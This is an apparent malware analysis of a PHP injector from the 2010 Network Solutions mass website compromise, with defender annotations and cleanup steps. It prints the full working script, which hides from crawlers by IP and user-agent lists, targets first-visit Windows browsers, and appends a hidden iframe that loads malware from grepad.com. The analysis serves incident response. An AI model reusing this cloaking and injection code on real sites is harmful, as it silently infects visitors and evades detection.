Description:
Malware used on the Network Solutions mass attack: http://blog.sucuri.net/2010/05/new-infections-today-at-network.html
This file has been seen under several names (.nts, counter.cgi, root.ini, root.cgi, etc.), always inside the cgi-bin directory. It serves the page the visitor actually requested and appends a hidden (0x0) iframe to it, so that the browser silently pulls malware from:
http://virtual-ad.org/in.cgi?2 http://grepad.com/in.cgi?3
Clean up:
Remove the attacker's php.ini from the cgi-bin directory (presumably the mechanism that hooks this script into page serving — inspect it for the directive that references the script), and delete the script itself under whichever of the names above it was dropped. Then verify with a Windows browser User-Agent and cleared cookies: the code below serves the injection only once per 24 hours per browser and never to crawler IPs or user agents, so a crawler-based scan or a repeat visit can show a clean page while the site is still infected.
<? error_reporting(0);
// ---------------------------------------------------------------------------
// ANALYSIS NOTES (added for defenders; the code itself is left as found).
//
// This is the Network Solutions cgi-bin injector described above. On every
// request it:
//   1. classifies the visitor as crawler/bot or human (detectBot, detect_os);
//   2. reads the file the visitor asked for from disk
//      ($_SERVER[DOMAIN_PATH] . $_SERVER[REQUEST_URI]) and echoes it back;
//   3. for first-time (no "cook" cookie) Windows browsers only, appends a
//      0x0 iframe whose src is set to http://grepad.com/in.cgi?3 and sets
//      the cookie for 24 hours so the same browser is not hit again.
// Consequences for IR: the payload is never served to crawler IPs/UAs, never
// to non-Windows browsers (except the one exact Mac UA in $chk), and at most
// once per 24h per browser. To observe it, request a page with a Windows
// browser User-Agent, no cookies, from an IP not in $stop_ips_masks.
// error_reporting(0) also silences the notices the bare DOMAIN_PATH and
// REQUEST_URI constants further down would otherwise emit.
// ereg()/eregi() were removed in PHP 7; on such a host this file fatals and
// the site shows an empty/500 page instead of the injected one.
// ---------------------------------------------------------------------------
//===================================================================================================
// Sets the globals $is_human / $stop_ip_detected / $stop_agent_detected /
// $detected_str. A visitor is "not human" (and gets the clean page) when the
// client IP matches one of the crawler ranges below, when the User-Agent
// contains one of $stop_agents_masks, or when the User-Agent does not start
// with at least five letters.
function detectBot(){
    global $is_human,$stop_agent_detected,$stop_ip_detected,$detected_str;
    // Search-engine ranges plus single addresses (the trailing ones are
    // uncommented in the sample — presumably scanner/sandbox IPs the operator
    // wanted to avoid). The "." are unescaped and match any character.
    $stop_ips_masks = array(
        "66.249.[6-9][0-9].[0-9]+", // Google NetRange: 66.249.64.0 - 66.249.95.255
        "74.125.[0-9]+.[0-9]+", // Google NetRange: 74.125.0.0 - 74.125.255.255
        "65.5[2-5].[0-9]+.[0-9]+", // MSN NetRange: 65.52.0.0 - 65.55.255.255
        "74.6.[0-9]+.[0-9]+", // Yahoo NetRange: 74.6.0.0 - 74.6.255.255
        "67.195.[0-9]+.[0-9]+", // Yahoo#2 NetRange: 67.195.0.0 - 67.195.255.255
        "72.30.[0-9]+.[0-9]+", // Yahoo#3 NetRange: 72.30.0.0 - 72.30.255.255
        "38.[0-9]+.[0-9]+.[0-9]+", // Cuill: NetRange: 38.0.0.0 - 38.255.255.255
        "93.172.94.227", // MacFinder
        "212.100.250.218", // Wells Search II
        "71.165.223.134", // Indy Library
        "70.91.180.25", "65.93.62.242", "74.193.246.129", "213.144.15.38", "195.92.229.2", "70.50.189.191", "218.28.88.99", "165.160.2.20", "89.122.224.230", "66.230.175.124", "218.18.174.27", "65.33.87.94", "67.210.111.241", "81.135.175.70", "64.69.34.134", "89.149.253.169"
    );
    // Case-insensitive substrings. "http" catches crawler UAs that carry an
    // info URL; "curl", "PHP" and "WordPress" keep scripted fetches (and
    // WordPress's own HTTP client) on the clean path.
    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress");
    // Strips a literal "User-Agent:" prefix if present. NOTE(review): "[s ]"
    // was presumably "[\s ]" before the blog's rendering lost the backslash —
    // confirm against a raw sample before signaturing this line.
    $_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent:[s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]);
    $is_human = true;
    $stop_ip_detected = false;
    $stop_agent_detected = false;
    $detected_str = "";
    // defineIP() trusts X-Forwarded-For, so this whole check is spoofable:
    // sending "X-Forwarded-For: 66.249.70.1" forces the clean page for
    // anyone, and a real crawler behind a proxy that sets XFF may be missed.
    foreach ($stop_ips_masks as $stop_ip_mask)
        if(eregi("^{$stop_ip_mask}$", defineIP())) {
            $is_human = false;
            $stop_ip_detected = true;
            $detected_str = "by ip";
            break;
        }
    if($is_human)
        foreach($stop_agents_masks as $stop_agents_mask)
            if(eregi($stop_agents_mask, @$_SERVER["HTTP_USER_AGENT"]) !== false){
                $is_human = false;
                $stop_agent_detected = true;
                $detected_str = "by agent";
                break;
            }
    // Anything not beginning with five letters ("Mozilla", "Opera", ...) is
    // treated as a tool rather than a browser.
    if($is_human and !eregi("^[a-zA-Z]{5,}", @$_SERVER["HTTP_USER_AGENT"])) {
        $is_human = false;
        $stop_agent_detected = true;
        $detected_str = "not human agent";
    }
}
// Returns X-Forwarded-For when the header is present, else REMOTE_ADDR.
// The header is client-controlled, which makes the IP check above trivial to
// bypass in either direction.
function defineIP(){
    if(isset($_SERVER["HTTP_X_FORWARDED_FOR"]))
        return $_SERVER["HTTP_X_FORWARDED_FOR"];
    else
        return $_SERVER['REMOTE_ADDR'];
}
detectBot();
//===================================================================================================
// Sets the global $os from the User-Agent: a second, independent bot list
// first ("Bots"), then a first-match OS chain. Only whether the result
// contains "Windows" (and is not "Windows CE") matters to the injection
// decision below; everything else is carried along unused.
function detect_os() {
    global $os;
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    if ((eregi("Google", $user_agent)) or (eregi("gsa-crawler", $user_agent)) or (eregi("Yahoo", $user_agent)) or (eregi("msnbot", $user_agent)) or (eregi("Turtle", $user_agent)) or (eregi("Yandex", $user_agent)) or (eregi("YaDirectBot", $user_agent)) or (eregi("Rambler", $user_agent)) or (eregi("James Bond", $user_agent)) or (eregi("Ask Jeeves", $user_agent)) or (eregi("Baiduspider", $user_agent)) or (eregi("EltaIndexer", $user_agent)) or (eregi("GameSpyHTTP", $user_agent)) or (eregi("grub-client", $user_agent)) or (eregi("Slurp", $user_agent)) or (eregi("Pagebull", $user_agent)) or (eregi("Scooter", $user_agent)) or (eregi("Nutch", $user_agent)) or (eregi("Zeus", $user_agent)) or (eregi("WebAlta", $user_agent)) or (eregi("Wget", $user_agent)) or (eregi("bot", $user_agent)) or (eregi("ia_archiver", $user_agent))) {$os = "Bots";}
    // Case-sensitive ereg() from here on (except where eregi() is written).
    elseif (ereg("Windows 95", $user_agent)) $os = "Windows 95";
    elseif (ereg("Windows NT 4", $user_agent)) $os = "Windows NT 4";
    elseif (ereg("Windows 98", $user_agent)) $os = "Windows 98";
    elseif (ereg("Win 9x 4.9", $user_agent)) $os = "Windows ME";
    elseif (ereg("Windows NT 5.0", $user_agent)) $os = "Windows 2000";
    elseif (ereg("Windows NT 5.1", $user_agent)) $os = "Windows XP";
    elseif (ereg("Windows NT 5.2", $user_agent)) $os = "Windows 2003";
    elseif (ereg("Windows NT 6.0", $user_agent)) $os = "Windows Vista";
    elseif (ereg("Windows NT 6.1", $user_agent)) $os = "Windows 7";
    elseif (ereg("Windows CE", $user_agent)) $os = "Windows CE";
    elseif (ereg("iPhone", $user_agent)) $os = "iPhone OS";
    elseif (ereg("Symbian", $user_agent)) $os = "Symbian OS";
    elseif (ereg("Linux", $user_agent)) $os = "Linux";
    elseif (ereg("SunOS", $user_agent)) $os = "SunOS";
    elseif (ereg("FreeBSD", $user_agent)) $os = "FreeBSD";
    elseif (ereg("NetBSD", $user_agent)) $os = "NetBSD";
    elseif (ereg("PPC;", $user_agent)) $os = "Pocket PC";
    elseif ((ereg("PPC", $user_agent)) or (eregi("Mac_PowerPC", $user_agent))) $os = "Power PC";
    elseif (ereg("Mac OS", $user_agent)) $os = "Mac OS";
    elseif (eregi("PlayStation", $user_agent)) $os = "PlayStation";
    elseif (ereg("Nintendo Wii", $user_agent)) $os = "Nintendo Wii";
    elseif (ereg("Nitro", $user_agent)) $os = "Nintendo DS";
    elseif (ereg("J2ME/MIDP", $user_agent)) $os = "Mobile phone";
    else $os = "Unknown OS :(";
}
detect_os();
// Decodes to:
//   Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
// An exact-match allow-list: this one Mac UA receives the injection although
// every other non-Windows visitor does not — presumably so the operator
// could test from their own browser.
$chk=base64_decode("TW96aWxsYS81LjAgKE1hY2ludG9zaDsgVTsgSW50ZWwgTWFjIE9TIFggMTAuNTsgcnU7IHJ2OjEuOS4yLjMpIEdlY2tvLzIwMTAwNDAxIEZpcmVmb3gvMy42LjM=");
// Path of the file the visitor really asked for. DOMAIN_PATH and REQUEST_URI
// are bare constants, which PHP 5 resolves to the strings "DOMAIN_PATH" and
// "REQUEST_URI" (with a notice, silenced above). DOMAIN_PATH is not a standard
// $_SERVER key — presumably provided by the hosting environment; TODO confirm.
// REQUEST_URI includes any query string, so a request with "?..." matches
// neither is_file() nor is_dir() below and yields an empty response. The URI
// goes into a filesystem path unsanitised; whether "../" traversal is
// reachable depends on the web server's URI normalisation.
$_file=$_SERVER[DOMAIN_PATH].$_SERVER[REQUEST_URI];
// Inject when: no "cook" cookie yet AND classified human AND
// (Windows other than CE, OR the exact $chk User-Agent).
if( (!isset($_COOKIE["cook"]) && $is_human && eregi("Windows", $os) && $os!="Windows CE") || (!isset($_COOKIE["cook"]) && $is_human && $_SERVER['HTTP_USER_AGENT']==$chk)) {
    // Injected payload, appended after the genuine page. The markup that
    // matters for detection: a frameborder="0" iframe whose onload handler
    // sets src=http://grepad.com/in.cgi?3 and height/width 0, plus a "cook"
    // cookie valid for 24h (hours*3600000 ms).
    // NOTE(review): "<mce:script" and the unbalanced quotes around the
    // onload= handler look like artefacts of the blog's WYSIWYG editor rather
    // than the bytes served to victims — confirm against a raw capture before
    // building signatures on this exact text.
    $scr=<<<EOF
<mce:script type="text/javascript"><!--
function addCookie(name, value, hours) { var date = new Date(); date.setTime(date.getTime()+(hours*3600000)); var expires = "; expires="+date.toGMTString(); document.cookie = name+"="+value+expires+"; "; }
document.write('<iframe frameborder="0" onload=' if (!this.src){ this.src="http://grepad.com/in.cgi?3"; this.height=0; this.width=0;} '></iframe>');
addCookie("cook", "1", 24);
// --></mce:script>
<p>
EOF;
    if(is_file($_file)) { echo file_get_contents($_file); echo $scr; }
    // No "/" is inserted before index.html, so this relies on REQUEST_URI
    // ending in "/" for directory requests.
    if(is_dir($_file)) { echo file_get_contents($_file."index.html"); echo $scr; }
} else {
    // Everyone else (crawlers, non-Windows, repeat visitors within 24h) gets
    // the file verbatim — indistinguishable from the uninfected site, which
    // is why crawler-based scanners miss this infection.
    if(is_file($_file)) { print(file_get_contents($_file)); }
    if(is_dir($_file)) { print(file_get_contents($_file."index.html")); }
}
?>